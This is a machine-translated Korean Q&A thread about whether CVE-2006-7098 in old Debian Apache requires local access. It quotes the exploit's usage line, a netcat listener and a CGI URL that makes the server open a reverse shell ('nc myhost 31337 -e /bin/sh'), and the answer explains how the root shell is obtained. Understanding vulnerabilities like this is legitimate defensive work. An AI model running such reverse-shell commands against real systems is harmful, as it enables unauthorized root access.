CVE 2006-7098 취약한 Debian에 액세스(로그인)가 필요합니까?

CVE 2006-7098 취약한 Debian에 액세스(로그인)가 필요합니까?

저는 Apache 1.3.34 이전 버전의 취약점을 해결하기 위해 노력하고 있습니다. 그리고 CVE 2006-7098 취약점이 어떤 상황에서 악용될 수 있는지 잘 모르겠습니다. 이것읽어보기 파일익스플로잇에는 다음이 포함됩니다.

로컬 공격자는 Apache에 영향을 주어 Apache 프로세스를 시작한 사용자(보통 루트)가 소유한 공개 tty에 명령을 전달하도록 할 수 있습니다. 이로 인해 임의의 명령이 실행될 수 있습니다. 참고: CGI 실행 권한이 있어야 하며 루트로 셸을 통해 수동으로 서비스를 시작해야 합니다.

용법:CNC-vvv-lp 31337 http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d

처음에 나는 취약한 서버와 동일한 네트워크에 있는 다른 컴퓨터에서 취약성이 악용될 수 있다는 것을 알았습니다. 그래서 다른 머신(공격자)으로부터 나는:

  • cgipwn 익스플로잇을 컴파일하고 공격자 머신 아파치의 cgi-bin에 설치합니다.
  • 공격자의 시스템에서 nc 명령을 실행하고 -p를 공격자의 Apache가 수신 대기하는 포트로 지정합니다.네트워크 서버공격자 시스템의 IP로내 호스트취약한 서버로.

그러나 나는 성공하지 못했습니다. 명령은 아무것도 반환하지 않습니다.

그래서 익스플로잇 정보를 여러번 다시 읽어보니 이 문장에 의문점이 생겼습니다.지역 공격자: 이는 취약한 Apache를 실행하는 동일한 컴퓨터에서만 취약점이 악용될 수 있다는 의미입니까? 이 경우, 나는 공격자가 먼저 아파치를 관리할 수 있는 권한이 있는 시스템에서 유효한 사용자의 자격 증명을 가져야 한다는 것을 이해합니다(이렇게 하면 공격의 적용 가능성이 크게 줄어듭니다).

누구든지 이것을 설명할 수 있나요?

답변1

따라서 익스플로잇 정보를 여러 번 다시 읽은 후 "로컬 공격자"라는 용어에 대해 약간의 의문이 생겼습니다. 이는 취약한 Apache를 실행하는 동일한 컴퓨터에서만 취약점을 익스플로잇할 수 있다는 의미입니까? 이 경우, 나는 공격자가 먼저 아파치를 관리할 수 있는 권한이 있는 시스템에서 유효한 사용자의 자격 증명을 가져야 한다는 것을 이해합니다(이렇게 하면 공격의 적용 가능성이 크게 줄어듭니다).

당신 말이 맞아요. 실제로 는 webserver이 취약점이 있는 대상 서버, myhost즉 공격자의 머신입니다.

공격자는 cgipwn바이너리 파일을 디렉토리에 배치 webserver하고 이를 /cgi-bin열어서 (보통) Apache를 시작한 사용자로서 작업을 수행하려고 시도합니다.http://webserver/cgi-bin/cgipwn?...nc myhost 31337 /bin/shwebserverroot

공격자는 에서 연결을 수락할 수 nc -vvv -l -p 31337있도록 이전에 실행했습니다 . 모든 것이 순조롭게 진행되면 공격자는 Apache를 시작한 사용자로 실행되는 대화형 세션 에 액세스할 수 있습니다 .myhostncwebserver/bin/shwebserver

관련 정보